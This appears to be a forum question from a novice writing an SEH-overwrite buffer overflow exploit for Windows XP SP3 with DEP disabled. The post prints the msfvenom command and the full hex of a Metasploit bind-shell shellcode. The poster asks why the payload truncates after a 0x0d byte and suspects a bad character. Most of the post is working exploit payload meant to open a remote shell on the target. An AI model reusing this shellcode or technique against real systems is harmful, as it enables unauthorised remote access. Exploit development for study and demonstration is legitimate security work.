I'm writing a simple buffer overflow exploit demonstration. I have successfully managed to use it to launch calc.exe with a 343-byte-long shellcode and can also guarantee that I have at least 400 bytes of space (probably much more, but that's more than I should need).
I generated the following shell_bind_tcp using msfvenom with:
> msfvenom -p windows/shell_bind_tcp -b '\x00' -f python
shellcode = ""
shellcode += "\xba\xa5\x9f\xf1\x94\xd9\xce\xd9\x74\x24\xf4\x5e\x33"
shellcode += "\xc9\xb1\x53\x83\xee\xfc\x31\x56\x0e\x03\xf3\x91\x13"
shellcode += "\x61\x07\x45\x51\x8a\xf7\x96\x36\x02\x12\xa7\x76\x70"
shellcode += "\x57\x98\x46\xf2\x35\x15\x2c\x56\xad\xae\x40\x7f\xc2"
shellcode += "\x07\xee\x59\xed\x98\x43\x99\x6c\x1b\x9e\xce\x4e\x22"
shellcode += "\x51\x03\x8f\x63\x8c\xee\xdd\x3c\xda\x5d\xf1\x49\x96"
shellcode += "\x5d\x7a\x01\x36\xe6\x9f\xd2\x39\xc7\x0e\x68\x60\xc7"
shellcode += "\xb1\xbd\x18\x4e\xa9\xa2\x25\x18\x42\x10\xd1\x9b\x82"
shellcode += "\x68\x1a\x37\xeb\x44\xe9\x49\x2c\x62\x12\x3c\x44\x90"
shellcode += "\xaf\x47\x93\xea\x6b\xcd\x07\x4c\xff\x75\xe3\x6c\x2c"
shellcode += "\xe3\x60\x62\x99\x67\x2e\x67\x1c\xab\x45\x93\x95\x4a"
shellcode += "\x89\x15\xed\x68\x0d\x7d\xb5\x11\x14\xdb\x18\x2d\x46" # chops off after 4 bytes here
shellcode += "\x84\xc5\x8b\x0d\x29\x11\xa6\x4c\x26\xd6\x8b\x6e\xb6"
shellcode += "\x70\x9b\x1d\x84\xdf\x37\x89\xa4\xa8\x91\x4e\xca\x82"
shellcode += "\x66\xc0\x35\x2d\x97\xc9\xf1\x79\xc7\x61\xd3\x01\x8c"
shellcode += "\x71\xdc\xd7\x39\x79\x7b\x88\x5f\x84\x3b\x78\xe0\x26"
shellcode += "\xd4\x92\xef\x19\xc4\x9c\x25\x32\x6d\x61\xc6\x2d\x32"
shellcode += "\xec\x20\x27\xda\xb8\xfb\xdf\x18\x9f\x33\x78\x62\xf5"
shellcode += "\x6b\xee\x2b\x1f\xab\x11\xac\x35\x9b\x85\x27\x5a\x1f"
shellcode += "\xb4\x37\x77\x37\xa1\xa0\x0d\xd6\x80\x51\x11\xf3\x72"
shellcode += "\xf1\x80\x98\x82\x7c\xb9\x36\xd5\x29\x0f\x4f\xb3\xc7"
shellcode += "\x36\xf9\xa1\x15\xae\xc2\x61\xc2\x13\xcc\x68\x87\x28"
shellcode += "\xea\x7a\x51\xb0\xb6\x2e\x0d\xe7\x60\x98\xeb\x51\xc3"
shellcode += "\x72\xa2\x0e\x8d\x12\x33\x7d\x0e\x64\x3c\xa8\xf8\x88"
shellcode += "\x8d\x05\xbd\xb7\x22\xc2\x49\xc0\x5e\x72\xb5\x1b\xdb"
shellcode += "\x82\xfc\x01\x4a\x0b\x59\xd0\xce\x56\x5a\x0f\x0c\x6f"
shellcode += "\xd9\xa5\xed\x94\xc1\xcc\xe8\xd1\x45\x3d\x81\x4a\x20"
shellcode += "\x41\x36\x6a\x61"
It is 355 bytes long so fits well within my limit, but when I look at the debugger:
You can see that part of the shellcode gets replaced with 00 after 8915 ED68 (marked in the code above). The calc.exe shellcode doesn't get mashed up here and actually functions. I'm quite new to exploit writing and I have no idea why this is happening, although I'm guessing it's something to do with the contents of the shellcode (perhaps another "bad character" besides 00?).
The target platform is Windows XP SP3 with DEP disabled. The exploit overwrites SEH with a POP-POP-RETN to return to NSEH which jumps over a few bytes to land in the shellcode. Like I said, exploit works fine with another shellcode, but I need to demonstrate with a remote shell.
EDIT: Am now wondering if 0d is also not forbidden (it's the byte right after the cut-off point), will try and get back.